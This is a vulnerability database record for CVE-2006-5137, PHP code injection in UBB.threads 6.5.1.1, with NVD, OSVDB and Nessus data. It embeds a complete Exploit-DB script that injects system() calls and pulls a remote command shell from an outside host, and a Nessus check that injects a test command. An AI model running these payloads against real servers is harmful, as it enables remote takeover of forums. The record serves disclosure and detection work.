ID CVE-2006-5137 Type cve Reporter cve@mitre.org Modified 2018-10-17T21:41:00
Description
Multiple direct static code injection vulnerabilities in Groupee UBB.threads 6.5.1.1 allow remote attackers to (1) inject PHP code via a theme[] array parameter to admin/doedittheme.php, which is injected into includes/theme.inc.php; (2) inject PHP code via a config[] array parameter to admin/doeditconfig.php, and then execute the code via includes/config.inc.php; and inject a reference to PHP code via a URL in the config[path] parameter, and then execute the code via (3) dorateuser.php, (4) calendar.php, and unspecified other scripts.
{"id": "CVE-2006-5137", "bulletinFamily": "NVD", "title": "CVE-2006-5137", "description": "Multiple direct static code injection vulnerabilities in Groupee UBB.threads 6.5.1.1 allow remote attackers to (1) inject PHP code via a theme[] array parameter to admin/doedittheme.php, which is injected into includes/theme.inc.php; (2) inject PHP code via a config[] array parameter to admin/doeditconfig.php, and then execute the code via includes/config.inc.php; and inject a reference to PHP code via a URL in the config[path] parameter, and then execute the code via (3) dorateuser.php, (4) calendar.php, and unspecified other scripts.", "published": "2006-10-03T04:03:00", "modified": "2018-10-17T21:41:00", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5137", "reporter": "cve@mitre.org", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/29274", "http://www.securityfocus.com/bid/20266", "http://securityreason.com/securityalert/1676", "http://www.securityfocus.com/archive/1/447359/100/0/threaded"], "cvelist": ["CVE-2006-5137"], "type": "cve", "lastseen": "2021-02-02T05:27:24", "edition": 4, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:32324", "OSVDB:32321", "OSVDB:32322", "OSVDB:32323"]}, {"type": "exploitdb", "idList": ["EDB-ID:2457"]}, {"type": "nessus", "idList": ["UBBTHREADS_DOEDITCONFIG_CMD_INJECTION.NASL"]}], "modified": "2021-02-02T05:27:24", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-02-02T05:27:24", "rev": 2}, "vulnersScore": 6.9}, "cpe": ["cpe:/a:ubbcentral:ubb.threads:6.5.1.1"], "affectedSoftware": [{"cpeName": "ubbcentral:ubb.threads", "name": "ubbcentral ubb.threads", "operator": "eq", "version": "6.5.1.1"}], "cvss2": {"cvssV2": {"accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 4.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}, "cpe23": ["cpe:2.3:a:ubbcentral:ubb.threads:6.5.1.1:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:ubbcentral:ubb.threads:6.5.1.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "20266", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/20266"}, {"name": "1676", "refsource": "SREASON", "tags": [], "url": "http://securityreason.com/securityalert/1676"}, {"name": "20060929 UBB.threads Multiple input validation error", "refsource": "BUGTRAQ", "tags": [], "url": "http://www.securityfocus.com/archive/1/447359/100/0/threaded"}, {"name": "ubbthreads-multiple-file-include(29274)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29274"}]}
{"osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2006-5137"], "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 32322](https://vulners.com/osvdb/OSVDB:32322)\n[Related OSVDB ID: 32321](https://vulners.com/osvdb/OSVDB:32321)\n[Related OSVDB ID: 32325](https://vulners.com/osvdb/OSVDB:32325)\n[Related OSVDB ID: 32320](https://vulners.com/osvdb/OSVDB:32320)\n[Related OSVDB ID: 32324](https://vulners.com/osvdb/OSVDB:32324)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0495.html\nISS X-Force ID: 29274\n[CVE-2006-5137](https://vulners.com/cve/CVE-2006-5137)\nBugtraq ID: 20266\n", "edition": 1, "modified": "2006-09-29T19:11:49", "published": "2006-09-29T19:11:49", "href": "https://vulners.com/osvdb/OSVDB:32323", "id": "OSVDB:32323", "title": "UBB.threads dorateuser.php config[path] Variable PHP Code Injection", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2006-5137"], "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 32322](https://vulners.com/osvdb/OSVDB:32322)\n[Related OSVDB ID: 32323](https://vulners.com/osvdb/OSVDB:32323)\n[Related OSVDB ID: 32321](https://vulners.com/osvdb/OSVDB:32321)\n[Related OSVDB ID: 32325](https://vulners.com/osvdb/OSVDB:32325)\n[Related OSVDB ID: 32320](https://vulners.com/osvdb/OSVDB:32320)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0495.html\nISS X-Force ID: 29274\n[CVE-2006-5137](https://vulners.com/cve/CVE-2006-5137)\nBugtraq ID: 20266\n", "edition": 1, "modified": "2006-09-29T19:11:49", "published": "2006-09-29T19:11:49", "href": "https://vulners.com/osvdb/OSVDB:32324", "id": "OSVDB:32324", "title": "UBB.threads calendar.php config[path] Variable PHP Code Injection", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2006-5137"], "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 32322](https://vulners.com/osvdb/OSVDB:32322)\n[Related OSVDB ID: 32323](https://vulners.com/osvdb/OSVDB:32323)\n[Related OSVDB ID: 32325](https://vulners.com/osvdb/OSVDB:32325)\n[Related OSVDB ID: 32320](https://vulners.com/osvdb/OSVDB:32320)\n[Related OSVDB ID: 32324](https://vulners.com/osvdb/OSVDB:32324)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0495.html\nISS X-Force ID: 29274\n[CVE-2006-5137](https://vulners.com/cve/CVE-2006-5137)\nBugtraq ID: 20266\n", "edition": 1, "modified": "2006-09-29T19:11:49", "published": "2006-09-29T19:11:49", "href": "https://vulners.com/osvdb/OSVDB:32321", "id": "OSVDB:32321", "title": "UBB.threads admin/doedittheme.php theme[] Variable PHP Code Injection", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2006-5137"], "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 32323](https://vulners.com/osvdb/OSVDB:32323)\n[Related OSVDB ID: 32321](https://vulners.com/osvdb/OSVDB:32321)\n[Related OSVDB ID: 32325](https://vulners.com/osvdb/OSVDB:32325)\n[Related OSVDB ID: 32320](https://vulners.com/osvdb/OSVDB:32320)\n[Related OSVDB ID: 32324](https://vulners.com/osvdb/OSVDB:32324)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0495.html\nISS X-Force ID: 29274\n[CVE-2006-5137](https://vulners.com/cve/CVE-2006-5137)\nBugtraq ID: 20266\n", "edition": 1, "modified": "2006-09-29T19:11:49", "published": "2006-09-29T19:11:49", "href": "https://vulners.com/osvdb/OSVDB:32322", "id": "OSVDB:32322", "title": "UBB.threads admin/doeditconfig.php config[] Variable PHP Code Injection", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T16:18:02", "description": "UBB.threads <= 6.5.1.1 (doeditconfig.php) Code Execution Exploit. CVE-2006-5137. Webapps exploit for php platform", "published": "2006-09-29T00:00:00", "type": "exploitdb", "title": "UBB.threads <= 6.5.1.1 doeditconfig.php Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5137"], "modified": "2006-09-29T00:00:00", "id": "EDB-ID:2457", "href": "https://www.exploit-db.com/exploits/2457/", "sourceData": "#!/usr/bin/php -q -d short_open_tag=on\n<?\n// UBB.threads Multiple input validation error\n\n// Discovered By : HACKERS PAL\n// Copy rights : HACKERS PAL\n// Website : http://www.soqor.net\n// Email Address : security@soqor.net\n\n// Tested on Version 6 (6.5.1.1) and other versions maybe affected\n\n// Remote File including :\n// ubbt.inc.php?GLOBALS[thispath]=http://localhost/cmd.txt?&cmd=dir\n// ubbt.inc.php?GLOBALS[configdir]=http://localhost/cmd.txt?&cmd=dir\n// -------------------------------------------------------\n// Files overwrite vulnerabilities\n// if magic_qoutes_gpc = off\n\n// admin/doedittheme.php?theme[soqor]=\".system($_GET[cmd]).\"&thispath=../\n// and open includes/theme.inc.php?cmd=ls -la\n// or :-\n// admin/doeditconfig.php?config[soqor]=\".system($_GET[cmd]).\"&thispath=../\n// and open includes/config.inc.php?cmd=ls -la\n\n// -- # -- # -- # --\n\n// if magic_qoutes_gpc = on\n// admin/doeditconfig.php?thispath=../includes&config[path]=http://psevil.googlepages.com/cmd.txt?\n\n// and you will have a command execution files ..\n// example\n// dorateuser.php?cmd=ls -la\n// calendar.php?cmd=ls -la\n// and so many other files which includes using this variable ($config[path])\n// -------------------------------------------------------\n// Full path\n// cron/php/subscriptions.php\n// -------------------------------------------------------\n// Exploit :-\n\n/*\n/* UBB.threads Multiple vulnerabilities\n/* This exploit should allow you to execute commands\n/* By : HACKERS PAL\n/* WwW.SoQoR.NeT\n*/\nprint_r('\n/**********************************************/\n/* UBB.threads Command Execution */\n/* by HACKERS PAL <security@soqor.net> */\n/* site: http://www.soqor.net */');\nif ($argc<2) {\n\tprint_r('\n/* -- */\n/* Usage: php '.$argv[0].' host\n/* Example: */\n/* php '.$argv[0].' http://localhost/\n/**********************************************/\n');\n\tdie;\n}\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\n\n$url=$argv[1].\"/\";\n$exploit=\"admin/doeditconfig.php?thispath=../includes&config[path]=http://psevil.googlepages.com/cmd.txt?\";\n$page=$url.$exploit;\nFunction get_page($url)\n{\n\n\tif(function_exists(\"file_get_contents\"))\n\t{\n\n\t\t$contents = file_get_contents($url);\n\n\t}\n\telse\n\t{\n\t\t$fp=fopen(\"$url\",\"r\");\n\t\twhile($line=fread($fp,1024))\n\t\t{\n\t\t\t$contents=$contents.$line;\n\t\t}\n\n\t}\n\treturn $contents;\n}\n\n$page = get_page($page);\n\n$newpage = get_page($url.\"calendar.php\");\n\nif(eregi(\"Cannot execute a blank command\",$newpage))\n{\n\tDie(\"\\n[+] Exploit Finished\\n[+] Go To : \".$url.\"calendar.php?cmd=ls -la\\n[+] You Got Your Own PHP Shell\\n/* Visit us : WwW.SoQoR.NeT */\\n/**********************************************/\");\n}\nElse\n{\n\tDie(\"\\n[-] Exploit Failed\\n/* Visit us : WwW.SoQoR.NeT */\\n/**********************************************/\");\n}\n?>\n\n# milw0rm.com [2006-09-29]\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2457/"}], "nessus": [{"lastseen": "2021-01-20T15:18:50", "description": "The version of UBB.threads installed on the remote host fails to\nsanitize input to the 'thispath' and 'config' parameters of the\n'admin/doeditconfig.php' script before using them to update the\napplication's configuration file. Provided PHP's 'register_globals'\nsetting is enabled, an unauthenticated attacker may be able to exploit\nthis flaw to modify configuration settings for the affected\napplication and even injecting arbitrary PHP code to be executed\nwhenever the config file is loaded.\n\nThe version installed is reported to be vulnerable to additional\nissues, however, Nessus has not tested them.", "edition": 26, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2006-09-30T00:00:00", "title": "UBB.threads doeditconfig Arbitrary Command Injection", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5137"], "modified": "2006-09-30T00:00:00", "cpe": [], "id": "UBBTHREADS_DOEDITCONFIG_CMD_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/22480", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22480);\n script_version(\"1.24\");\n\n script_cve_id(\"CVE-2006-5137\");\n script_bugtraq_id(20266);\n script_xref(name:\"EDB-ID\", value:\"2457\");\n\n script_name(english:\"UBB.threads doeditconfig Arbitrary Command Injection\");\n script_summary(english:\"Tries to exploit an command injection flaw in UBB.threads\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that allows injection of\narbitrary PHP commands.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of UBB.threads installed on the remote host fails to\nsanitize input to the 'thispath' and 'config' parameters of the\n'admin/doeditconfig.php' script before using them to update the\napplication's configuration file. Provided PHP's 'register_globals'\nsetting is enabled, an unauthenticated attacker may be able to exploit\nthis flaw to modify configuration settings for the affected\napplication and even injecting arbitrary PHP code to be executed\nwhenever the config file is loaded.\n\nThe version installed is reported to be vulnerable to additional\nissues, however, Nessus has not tested them.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5b90f99d\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0666a806\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?324c0824\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Either disable PHP's 'register_globals' setting or upgrade to\nUBB.threads 6.5.5 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/09/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/09/30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"ubbthreads_detect.nasl\", \"no404.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/ubbthreads\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\nif (get_kb_item(\"www/no404/\" + port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/ubbthreads\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to create an alternate config file.\n #\n # nb: if subdir is \"/includes\" as in the published PoC, we trash the install!!!\n include(\"data_protection.inc\");\n subdir = \"/\";\n\n # nb: PHP code injection works if magic_quotes is disabled\n cmd = \"id\";\n exploit = string('\"; system(', cmd, ');\"');\n\n r = http_send_recv3(method:\"GET\", port: port,\n item:string(\n dir, \"/admin/doeditconfig.php?\",\n \"thispath=..\", subdir, \"&\",\n \"config[\", SCRIPT_NAME, \"]=\", urlencode(str:exploit)));\n if (isnull(r)) exit(0);\n res = r[2];\n\n # Now grab the freshly-minted config file.\n r = http_send_recv3(method:\"GET\", item:string(dir, subdir, \"/config.inc.php\"), port:port);\n if (isnull(r)) exit(0);\n res = strcat(r[0], r[1], '\\r\\n', r[2]);\n\n # There's definitely a problem if we see command output.\n line = egrep(pattern:\"uid=[0-9]+.*gid=[0-9]+.*\", string:res);\n if (line)\n {\n if (report_verbosity)\n {\n report = string(\n \"\\n\",\n \"Nessus was able to execute the command '\", cmd, \"' on the remote host.\\n\",\n \"It produced the following output :\\n\",\n \"\\n\",\n data_protection::sanitize_uid(output:line)\n );\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n }\n\n # Otherwise, there's a problem if it exists and we're being paranoid.\n if (report_paranoia > 1 && egrep(string:res, pattern:\"^HTTP/.* 200 OK\"))\n {\n security_hole(port);\n exit(0);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
